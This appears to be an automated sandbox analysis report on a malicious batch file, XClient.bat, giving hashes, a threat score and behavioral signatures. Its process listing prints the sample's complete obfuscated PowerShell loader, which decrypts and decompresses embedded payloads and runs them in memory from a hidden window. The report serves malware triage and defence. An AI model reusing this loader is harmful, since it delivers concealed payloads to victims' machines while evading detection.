Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
31-05-2024 12:54
Static task
static1
Behavioral task
behavioral1
Sample
XClient.bat
Resource
win7-20240221-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
XClient.bat
Resource
win10v2004-20240508-en
17 signatures
150 seconds
General
-
Target
XClient.bat
-
Size
306KB
-
MD5
5f114fbb47589f072b2329adeab0e2d7
-
SHA1
1572da87baa2fcd945be9ca5073cf2c27a5e4eda
-
SHA256
976bef5e2f4128e42bb344af988b88e188503c4f7df7452ee1a87947eea833a1
-
SHA512
4ffba8c4bc5771f90b64825880e033192bbafdf1952a29893d35821dbe675fc57b942ff22831848e3081da751804572f61b214cdc8b2a42523d069343f112b69
-
SSDEEP
6144:rCIqB5Xma5qnV7R+N8ymXO55y6wXYjuvgfazxjjNzMGryBNYqi/v:rJqnheT68ym6vfazxDyBiX
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2828 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2828 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2224 wrote to memory of 2828 2224 cmd.exe powershell.exe PID 2224 wrote to memory of 2828 2224 cmd.exe powershell.exe PID 2224 wrote to memory of 2828 2224 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\XClient.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W9ISWKk0uktoB21K/n8WP2z/EMIVG4ajR8KxvaCHQZc='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NiPaOPsEhb3GYyQq1AToPQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $TYqPW=New-Object System.IO.MemoryStream(,$param_var); $wUcjc=New-Object System.IO.MemoryStream; $lqjaM=New-Object System.IO.Compression.GZipStream($TYqPW, [IO.Compression.CompressionMode]::Decompress); $lqjaM.CopyTo($wUcjc); $lqjaM.Dispose(); $TYqPW.Dispose(); $wUcjc.Dispose(); $wUcjc.ToArray();}function execute_function($param_var,$param2_var){ $zoSsA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VRasO=$zoSsA.EntryPoint; $VRasO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient.bat';$qsbcF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient.bat').Split([Environment]::NewLine);foreach ($jzVlk in $qsbcF) { if ($jzVlk.StartsWith(':: ')) { $ZvyRr=$jzVlk.Substring(3); break; }}$payloads_var=[string[]]$ZvyRr.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-